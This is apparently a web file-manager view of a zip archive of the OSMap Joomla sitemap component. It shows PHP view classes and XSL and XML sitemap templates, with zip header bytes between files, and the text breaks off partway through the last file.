File manager - Edit - /home/opticamezl/www/newok/com_osmap.zip
Back
PK ��\ �k|� � % views/adminsitemapitems/view.html.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Component\Helper as ComponentHelper; use Alledia\OSMap\Factory; use Alledia\OSMap\Sitemap\SitemapInterface; use Joomla\CMS\Language\Text; use Joomla\CMS\MVC\View\HtmlView; use Joomla\Input\Input; use Joomla\Registry\Registry; defined('_JEXEC') or die(); class OSMapViewAdminSitemapItems extends HtmlView { /** * @var Registry */ protected $params = null; /** * @var SitemapInterface */ protected $sitemap = null; /** * @var Registry */ protected $osmapParams = null; /** * @var string */ protected $message = null; /** * @inheritDoc * @throws Exception */ public function display($tpl = null) { $this->checkAccess(); $container = Factory::getPimpleContainer(); try { $id = $container->input->getInt('id'); $this->params = Factory::getApplication()->getParams(); // Load the sitemap instance $this->sitemap = Factory::getSitemap($id); $this->osmapParams = ComponentHelper::getParams(); } catch (Exception $e) { $this->message = $e->getMessage(); } parent::display($tpl); } /** * This view should only be available from the backend * * @return void * @throws Exception */ protected function checkAccess() { $server = new Input(array_change_key_case($_SERVER, CASE_LOWER)); $referer = parse_url($server->getString('http_referer')); if (empty($referer['query']) == false) { parse_str($referer['query'], $query); $option = empty($query['option']) ? null : $query['option']; $view = empty($query['view']) ? null : $query['view']; if ($option == 'com_osmap' && $view == 'sitemapitems') { // Good enough return; } } throw new Exception(Text::_('JERROR_PAGE_NOT_FOUND'), 404); } } PK ��\|�x�� � . views/adminsitemapitems/tmpl/default_items.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Joomla\CMS\HTML\HTMLHelper; use Joomla\CMS\Language\Text; use Joomla\CMS\Version; defined('_JEXEC') or die(); $frequncyOptions = HTMLHelper::_('osmap.frequencyList'); array_walk( $frequncyOptions, function (string &$text, string $value) { $text = HTMLHelper::_('select.option', $value, $text); } ); $priorityOptions = array_map( function (float $priority) { return HTMLHelper::_('select.option', $priority, $priority); }, HTMLHelper::_('osmap.priorityList') ); $showItemUid = $this->osmapParams->get('show_item_uid', 0); $showExternalLinks = (int)$this->osmapParams->get('show_external_links', 0); $items = []; $this->sitemap->traverse( /** * @param object $item * * @return bool */ function (object $item) use (&$items, &$showItemUid, &$showExternalLinks) { if ( ($item->isInternal == false && $showExternalLinks === 0) || $item->hasCompatibleLanguage() == false ) : return false; endif; if ($showExternalLinks === 2) : // Display only in the HTML sitemap $item->addAdminNote('COM_OSMAP_ADMIN_NOTE_IGNORED_EXTERNAL_HTML'); endif; // Add notes about sitemap visibility if ($item->visibleForXML == false) : $item->addAdminNote('COM_OSMAP_ADMIN_NOTE_VISIBLE_HTML_ONLY'); endif; if ($item->visibleForHTML == false) : $item->addAdminNote('COM_OSMAP_ADMIN_NOTE_VISIBLE_XML_ONLY'); endif; if ($item->visibleForRobots == false) : $item->addAdminNote('COM_OSMAP_ADMIN_NOTE_INVISIBLE_FOR_ROBOTS'); endif; if ($item->parentIsVisibleForRobots == false) : $item->addAdminNote('COM_OSMAP_ADMIN_NOTE_PARENT_INVISIBLE_FOR_ROBOTS'); endif; $items[] = $item; return true; }, false, true ); $count = count($items); ?> <table class="adminlist table table-striped" id="itemList"> <thead> <tr> <th style="width: 1%;min-width:55px" class="text-center center"> <?php echo Text::_('COM_OSMAP_HEADING_STATUS'); ?> </th> <th class="title"> <?php echo Text::_('COM_OSMAP_HEADING_URL'); ?> </th> <th class="title"> <?php echo Text::_('COM_OSMAP_HEADING_TITLE'); ?> </th> <th class="text-center center"> <?php echo Text::_('COM_OSMAP_HEADING_PRIORITY'); ?> </th> <th class="text-center center"> <?php echo Text::_('COM_OSMAP_HEADING_CHANGE_FREQ'); ?> </th> </tr> </thead> <tbody> <?php foreach ($items as $row => $item) : ?> <tr class="sitemapitem <?php echo 'row' . $row; ?> <?php echo ($showItemUid) ? 'with-uid' : ''; ?>" data-uid="<?php echo $item->uid; ?>" data-settings-hash="<?php echo $item->settingsHash; ?>"> <td class="text-center center"> <div class="sitemapitem-published" data-original="<?php echo $item->published ? '1' : '0'; ?>" data-value="<?php echo $item->published ? '1' : '0'; ?>"> <?php $class = $item->published ? 'publish' : 'unpublish'; $title = $item->published ? 'COM_OSMAP_TOOLTIP_CLICK_TO_UNPUBLISH' : 'COM_OSMAP_TOOLTIP_CLICK_TO_PUBLISH'; ?> <span title="<?php echo Text::_($title); ?>" class="hasTooltip icon-<?php echo $class; ?>"> </span> </div> <?php if ($notes = $item->getAdminNotesString()) : ?> <span class="icon-warning hasTooltip osmap-info" title="<?php echo $notes; ?>"></span> <?php endif; ?> </td> <td class="sitemapitem-link"> <?php if ($item->level > 0) : ?> <span class="level-mark"><?php echo str_repeat('—', $item->level); ?></span> <?php endif; if ($item->rawLink !== '#' && $item->link !== '#') : if (Version::MAJOR_VERSION < 4) : echo '<span class="icon-new-tab"></span>'; endif; echo HTMLHelper::_( 'link', $item->rawLink, $item->rawLink, [ 'target' => '_blank', 'class' => 'hasTooltip', 'title' => $item->link, ] ); else : echo sprintf('<span>%s</span>', $item->name ?? ''); endif; if ($showItemUid) : echo sprintf( '<br><div class="small osmap-item-uid">%s: %s</div>', Text::_('COM_OSMAP_UID'), $item->uid ); endif; ?> </td> <td class="sitemapitem-name"> <?php echo $item->name ?? ''; ?> </td> <td class="text-center center"> <div class="sitemapitem-priority" data-original="<?php echo $item->priority; ?>" data-value="<?php echo sprintf('%03.1f', $item->priority); ?>"> <?php echo sprintf('%03.1f', $item->priority); ?> </div> </td> <td class="text-center center"> <div class="sitemapitem-changefreq" data-original="<?php echo $item->changefreq; ?>" data-value="<?php echo $item->changefreq; ?>"> <?php echo Text::_('COM_OSMAP_' . strtoupper($item->changefreq)); ?> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> <div><?php echo Text::sprintf('COM_OSMAP_NUMBER_OF_ITEMS_FOUND', $count); ?></div> <?php if (empty($count)) : ?> <div class="alert alert-warning"> <?php echo Text::_('COM_OSMAP_NO_ITEMS'); ?> </div> <?php endif; PK ��\Q��R� � ( views/adminsitemapitems/tmpl/default.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Factory; defined('_JEXEC') or die(); Factory::getApplication()->input->set('tmpl', 'component'); if (empty($this->message)) : echo $this->loadTemplate('items'); else : ?> <div class="alert alert-warning"> <?php echo $this->message; ?> </div> <?php endif; jexit(); PK ��\PO?� views/xsl/view.xsl.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Factory; use Alledia\OSMap\Helper\General; use Joomla\CMS\Application\SiteApplication; use Joomla\CMS\Language\Text; use Joomla\CMS\MVC\View\HtmlView; // phpcs:disable PSR1.Files.SideEffects defined('_JEXEC') or die(); // phpcs:enable PSR1.Files.SideEffects // phpcs:disable PSR1.Classes.ClassDeclaration.MissingNamespace class OsmapViewXsl extends HtmlView { /** * @var SiteApplication */ protected $app = null; /** * @var string */ protected $pageHeading = null; /** * @var string */ protected $pageTitle = null; /** * @var string */ protected $language = null; /** * @inheritDoc * @throws Exception */ public function __construct($config = []) { parent::__construct($config); $this->app = Factory::getApplication(); } /** * @inheritDoc */ public function display($tpl = null) { $document = $this->app->getDocument(); $this->language = $document->getLanguage(); $menu = $this->app->getMenu()->getActive(); $isOsmap = $menu && $menu->query['option'] == 'com_osmap'; $params = $this->app->getParams(); $type = General::getSitemapTypeFromInput(); $sitemap = Factory::getSitemap($this->app->input->getInt('id'), $type); $title = $params->get('page_title', ''); if ($isOsmap == false) { $title = $sitemap->name ?: $title; } if (empty($title)) { $title = $this->app->get('sitename'); } elseif ($this->app->get('sitename_pagetitles', 0) == 1) { $title = Text::sprintf('JPAGETITLE', $this->app->get('sitename'), $title); } elseif ($this->app->get('sitename_pagetitles', 0) == 2) { $title = Text::sprintf('JPAGETITLE', $title, $this->app->get('sitename')); } $this->pageTitle = $this->escape($title); if ($isOsmap && $params->get('show_page_heading')) { $this->pageHeading = $this->escape($params->get('page_heading') ?: $sitemap->name); } // We're going to cheat Joomla here because some referenced urls MUST remain http/insecure header(sprintf('Content-Type: text/xsl; charset="%s"', $this->_charset)); header('Content-Disposition: inline'); parent::display($tpl); jexit(); } } PK ��\;y�{ { views/xsl/tmpl/news.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Joomla\CMS\Language\Language; use Joomla\CMS\Language\Text; defined('_JEXEC') or die(); /** * @var OSMapViewXsl $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xna="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:news="http://www.google.com/schemas/sitemap-news/0.9" exclude-result-prefixes="xna"> <xsl:output indent="yes" method="html" omit-xml-declaration="yes"/> <xsl:template match="/"> <html lang="<?php echo $this->language; ?>"> <head> <title><?php echo $this->pageTitle; ?></title> <style> <![CDATA[ body { font-family: tahoma, sans-serif; position: relative; } table { font-size: 11px; width: 100%; } th { background: #9f8Fbf; color: #fff; text-align: left; padding: 4px; } tr:nth-child(even) { background: #eeF8ff; } td { padding: 1px; } .data a { text-decoration: none; } .icon-new-tab { font-size: 10px; margin-left: 4px; color: #b5b5b5; } .count { font-size: 12px; margin-bottom: 10px; } tr.sitemap-url td { background: #e6e3ec; padding: 1px 2px; color: #b3b3b3; } tr.sitemap-url td a.url { color: #b3b3b3; } .image-url td { padding-left: 12px; position: relative; } ]]> </style> </head> <body> <div class="header"> <div class="title"> <?php if ($this->pageHeading) : ?> <h1><?php echo Text::_($this->pageHeading); ?></h1> <?php endif; ?> <div class="count"> <?php echo Text::_('COM_OSMAP_NUMBER_OF_URLS'); ?>: <xsl:value-of select="count(xna:urlset/xna:url)"/> </div> </div> </div> <table class="data"> <thead> <tr> <th><?php echo Text::_('COM_OSMAP_HEADING_URL'); ?></th> <th><?php echo Text::_('COM_OSMAP_HEADING_TITLE'); ?></th> <th><?php echo Text::_('COM_OSMAP_HEADING_PUBLICATION_DATE'); ?></th> </tr> </thead> <tbody> <xsl:for-each select="xna:urlset/xna:url"> <xsl:variable name="sitemapURL"> <xsl:value-of select="xna:loc"/> </xsl:variable> <tr> <td> <a href="{$sitemapURL}" target="_blank" class="url"> <xsl:value-of select="$sitemapURL"/> </a> <span class="icon-new-tab"></span> </td> <td> <xsl:value-of select="news:news/news:title" /> </td> <td> <xsl:value-of select="news:news/news:publication_date" /> </td> </tr> </xsl:for-each> </tbody> </table> </body> </html> </xsl:template> </xsl:stylesheet> PK ��\mI�� � views/xsl/tmpl/images.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Joomla\CMS\Language\Language; use Joomla\CMS\Language\Text; defined('_JEXEC') or die(); /** * @var OSMapViewXsl $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xna="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" exclude-result-prefixes="xna"> <xsl:output indent="yes" method="html" omit-xml-declaration="yes"/> <xsl:template match="/"> <html lang="<?php echo $this->language; ?>"> <head> <title><?php echo $this->pageTitle; ?></title> <style> <![CDATA[ body { font-family: tahoma, sans-serif; position: relative; } table { font-size: 11px; width: 100%; } th { background: #9f8Fbf; color: #fff; text-align: left; padding: 4px; } tr:nth-child(even) { background: #eeF8ff; } td { padding: 1px; } .data a { text-decoration: none; } .icon-new-tab { font-size: 10px; margin-left: 4px; color: #b5b5b5; } .count { font-size: 12px; margin-bottom: 10px; } tr.sitemap-url td { background: #e6e3ec; padding: 1px 2px; color: #b3b3b3; } tr.sitemap-url td a.url { color: #b3b3b3; } .image-url td { padding-left: 12px; position: relative; } ]]> </style> </head> <body> <div class="header"> <div class="title"> <?php if ($this->pageHeading) : ?> <h1><?php echo Text::_($this->pageHeading); ?></h1> <?php endif; ?> <div class="count"> <?php echo Text::_('COM_OSMAP_NUMBER_OF_URLS'); ?>: <xsl:value-of select="count(xna:urlset/xna:url)"/> (<xsl:value-of select="count(xna:urlset/xna:url/image:image/image:loc)"/> <?php echo Text::_('COM_OSMAP_IMAGES'); ?>) </div> </div> </div> <table class="data"> <thead> <tr> <th><?php echo Text::_('COM_OSMAP_HEADING_URL'); ?></th> <th><?php echo Text::_('COM_OSMAP_HEADING_TITLE'); ?></th> </tr> </thead> <tbody> <xsl:for-each select="xna:urlset/xna:url"> <xsl:variable name="sitemapURL"> <xsl:value-of select="xna:loc"/> </xsl:variable> <tr class="sitemap-url"> <td> <a href="{$sitemapURL}" target="_blank" class="url"> <xsl:value-of select="$sitemapURL"/> </a> <span class="icon-new-tab"></span> (<xsl:value-of select="count(./image:image/image:loc)"/> <?php echo Text::_('COM_OSMAP_IMAGES'); ?>) </td> <td> <xsl:value-of select="./title"/> </td> </tr> <xsl:for-each select="image:image"> <xsl:variable name="imageURL"><xsl:value-of select="image:loc"/></xsl:variable> <tr class="image-url"> <td> <a href="{$imageURL}" target="_blank" class="image-url"> <xsl:value-of select="$imageURL"/> </a> <span class="icon-new-tab"></span> </td> <td> <xsl:value-of select="image:title"/> </td> </tr> </xsl:for-each> </xsl:for-each> </tbody> </table> </body> </html> </xsl:template> </xsl:stylesheet> PK ��\�X"[ [ views/xsl/tmpl/standard.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Joomla\CMS\Language\Language; use Joomla\CMS\Language\Text; defined('_JEXEC') or die(); /** * @var OSMapViewXsl $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xna="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" exclude-result-prefixes="xna"> <xsl:output indent="yes" method="html" omit-xml-declaration="yes"/> <xsl:template match="/"> <html lang="<?php echo $this->language; ?>"> <head> <title><?php echo $this->pageTitle; ?></title> <style> <![CDATA[ body { font-family: tahoma, sans-serif; position: relative; } table { font-size: 11px; width: 100%; } th { background: #9f8Fbf; color: #fff; text-align: left; padding: 4px; } tr:nth-child(even) { background: #eeF8ff; } td { padding: 1px; } .data a { text-decoration: none; } .icon-new-tab { font-size: 10px; margin-left: 4px; color: #b5b5b5; } .count { font-size: 12px; margin-bottom: 10px; } ]]> </style> </head> <body> <div class="header"> <div class="title"> <?php if ($this->pageHeading) : ?> <h1><?php echo Text::_($this->pageHeading); ?></h1> <?php endif; ?> <div class="count"> <?php echo Text::_('COM_OSMAP_NUMBER_OF_URLS'); ?>: <xsl:value-of select="count(xna:urlset/xna:url)"/> </div> </div> </div> <table class="data"> <thead> <tr> <th><?php echo Text::_('COM_OSMAP_URL'); ?></th> <th><?php echo Text::_('COM_OSMAP_MODIFICATION_DATE'); ?></th> <th><?php echo Text::_('COM_OSMAP_CHANGE_FREQ'); ?></th> <th><?php echo Text::_('COM_OSMAP_PRIORITY_LABEL'); ?></th> </tr> </thead> <tbody> <xsl:for-each select="xna:urlset/xna:url"> <xsl:variable name="sitemapURL"> <xsl:value-of select="xna:loc"/> </xsl:variable> <tr> <td> <a href="{$sitemapURL}" target="_blank"> <xsl:value-of select="$sitemapURL"/> </a> <span class="icon-new-tab"></span> </td> <td> <xsl:value-of select="xna:lastmod"/> </td> <td> <xsl:value-of select="xna:changefreq"/> </td> <td> <xsl:value-of select="xna:priority"/> </td> </tr> </xsl:for-each> </tbody> </table> </body> </html> </xsl:template> </xsl:stylesheet> PK ��\'�wZ� � views/xml/tmpl/default.xmlnu &1i� <?xml version="1.0" encoding="utf-8"?> <metadata> <layout title="COM_OSMAP_SITEMAP_XML_VIEW_DEFAULT_TITLE"> <message> <![CDATA[COM_OSMAP_SITEMAP_XML_VIEW_DEFAULT_DESC]]> </message> </layout> <fields name="request"> <fieldset name="request" addfieldpath="/administrator/components/com_osmap/form/fields"> <field name="id" type="osmap.sitemaps" required="true" label="COM_OSMAP_SITEMAP"/> <field name="format" type="hidden" default="xml"/> </fieldset> </fields> <fields name="params"> <fieldset name="basic" label="COM_OSMAP_FIELDSET_SITEMAP_SETTINGS_LABEL"> <field name="add_styling" type="radio" class="btn-group btn-group-yesno" layout="joomla.form.field.radio.switcher" label="COM_OSMAP_OPTION_ADD_STYLING_LABEL" description="COM_OSMAP_OPTION_ADD_STYLING_DESC" default="1"> <option value="0">JNO</option> <option value="1">JYES</option> </field> <field name="debug" type="radio" class="btn-group btn-group-yesno" layout="joomla.form.field.radio.switcher" label="COM_OSMAP_OPTION_DEBUG_LABEL" description="COM_OSMAP_OPTION_DEBUG_DESC" default="0"> <option value="0">JNO</option> <option value="1">JYES</option> </field> <field name="news_publication_name" type="text" label="COM_OSMAP_NEWS_PUBLICATION_NAME_LABEL" description="COM_OSMAP_NEWS_PUBLICATION_NAME_DESC"/> </fieldset> </fields> </metadata> PK ��\N|G� � views/xml/tmpl/default_items.phpnu &1i� <?php /** * @package OSMap * @copyright 2007-2014 XMap - Joomla! Vargas. All rights reserved. * @copyright 2016 Open Source Training, LLC. All rights reserved.. * @author Guillermo Vargas <guille@vargas.co.cr> * @author Alledia <support@alledia.com> * @license GNU General Public License version 2 or later; see LICENSE.txt * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <http://www.gnu.org/licenses/>. */ // no direct access defined('_JEXEC') or die('Restricted access'); // Create shortcut to parameters. $params = $this->state->get('params'); // Use the class defined in default_class.php to print the sitemap $this->displayer->printSitemap(); PK ��\��к� � views/xml/tmpl/default.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Joomla\CMS\Language\Language; defined('_JEXEC') or die(); /** * @var OsmapViewXml $this * @var object $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ echo sprintf('<?xml version="1.0" encoding="%s"?>' . "\n", $this->_charset); if (empty($this->message)) { echo $this->loadTemplate($this->type); } else { echo '<message>' . $this->message . '</message>'; } PK ��\`�� � ! views/xml/tmpl/default_images.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Sitemap\Item; use Joomla\CMS\Language\Language; use Joomla\Utilities\ArrayHelper; defined('_JEXEC') or die(); /** * @var OSMapViewXml $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ $ignoreDuplicates = (int)$this->osmapParams->get('ignore_duplicated_uids', 1); $printNodeCallback = function (Item $node) use ($ignoreDuplicates) { $display = !$node->ignore && $node->published && (!$node->duplicate || !$ignoreDuplicates) && $node->visibleForRobots && $node->parentIsVisibleForRobots && $node->visibleForXML && $node->isInternal && trim($node->fullLink) != '' && $node->hasCompatibleLanguage(); if ($display && !empty($node->images)) { echo '<url>'; echo sprintf('<loc><![CDATA[%s]]></loc>', $node->fullLink); foreach ($node->images as $image) { if (!empty($image->src)) { echo '<image:image>'; echo '<image:loc><![CDATA[' . $image->src . ']]></image:loc>'; echo empty($image->title) ? '<image:title/>' : '<image:title><![CDATA[' . $image->title . ']]></image:title>'; if (!empty($image->license)) { echo '<image:license><![CDATA[' . $image->license . ']]></image:license>'; } echo '</image:image>'; } } echo '</url>'; } /* * Return true if there were no images * so any child nodes will get checked */ return $display || empty($node->images); }; echo $this->addStylesheet(); $attributes = [ 'xmlns' => 'http://www.sitemaps.org/schemas/sitemap/0.9', 'xmlns:image' => 'http://www.google.com/schemas/sitemap-image/1.1' ]; echo sprintf('<urlset %s>', ArrayHelper::toString($attributes)); $this->sitemap->traverse($printNodeCallback); echo '</urlset>'; PK ��\^=�A� � # views/xml/tmpl/default_standard.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Helper\General; use Alledia\OSMap\Sitemap\Item; use Joomla\CMS\Language\Language; defined('_JEXEC') or die(); /** * @var OSMapViewXml $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ $showExternalLinks = (int)$this->osmapParams->get('show_external_links', 0); $ignoreDuplicates = (int)$this->osmapParams->get('ignore_duplicated_uids', 1); $debug = $this->params->get('debug', 0) ? "\n" : ''; $printNodeCallback = function (Item $node) use ($showExternalLinks, $ignoreDuplicates, $debug) { $display = !$node->ignore && $node->published && (!$node->duplicate || !$ignoreDuplicates) && $node->visibleForRobots && $node->parentIsVisibleForRobots && $node->visibleForXML && trim($node->fullLink) != ''; if ($display && !$node->isInternal) { // Show external links $display = $showExternalLinks === 1; } if (!$node->hasCompatibleLanguage()) { $display = false; } if (!$display) { return false; } echo $debug; echo '<url>'; echo '<loc><![CDATA[' . $node->fullLink . ']]></loc>'; if (!General::isEmptyDate($node->modified)) { echo '<lastmod>' . $node->modified . '</lastmod>'; } echo '<changefreq>' . $node->changefreq . '</changefreq>'; echo '<priority>' . $node->priority . '</priority>'; echo '</url>'; echo $debug; return true; }; echo $this->addStylesheet(); echo $debug . '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . $debug; $this->sitemap->traverse($printNodeCallback); echo '</urlset>'; PK ��\�e��� � views/xml/tmpl/default_news.phpnu &1i� <?php /** * @package OSMap * @contact www.joomlashack.com, help@joomlashack.com * @copyright 2007-2014 XMap - Joomla! Vargas - Guillermo Vargas. All rights reserved. * @copyright 2016-2025 Joomlashack.com. All rights reserved. * @license https://www.gnu.org/licenses/gpl.html GNU/GPL * * This file is part of OSMap. * * OSMap is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * (at your option) any later version. * * OSMap is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OSMap. If not, see <https://www.gnu.org/licenses/>. */ use Alledia\OSMap\Sitemap\Item; use Joomla\CMS\Language\Language; use Joomla\Utilities\ArrayHelper; defined('_JEXEC') or die(); /** * @var OSMapViewXml $this * @var string $template * @var string $layout * @var string $layoutTemplate * @var Language $lang * @var string $filetofind */ $debug = $this->params->get('debug', 0) ? "\n" : ''; $printNodeCallback = function (Item $node) { $display = !$node->ignore && $node->published && (!$node->duplicate || !$this->osmapParams->get('ignore_duplicated_uids', 1)) && isset($node->newsItem) && !empty($node->newsItem) && $node->visibleForRobots && $node->parentIsVisibleForRobots && $node->visibleForXML && $node->isInternal && trim($node->fullLink) != '' && $node->hasCompatibleLanguage(); /** @var DateTime $publicationDate */ $publicationDate = 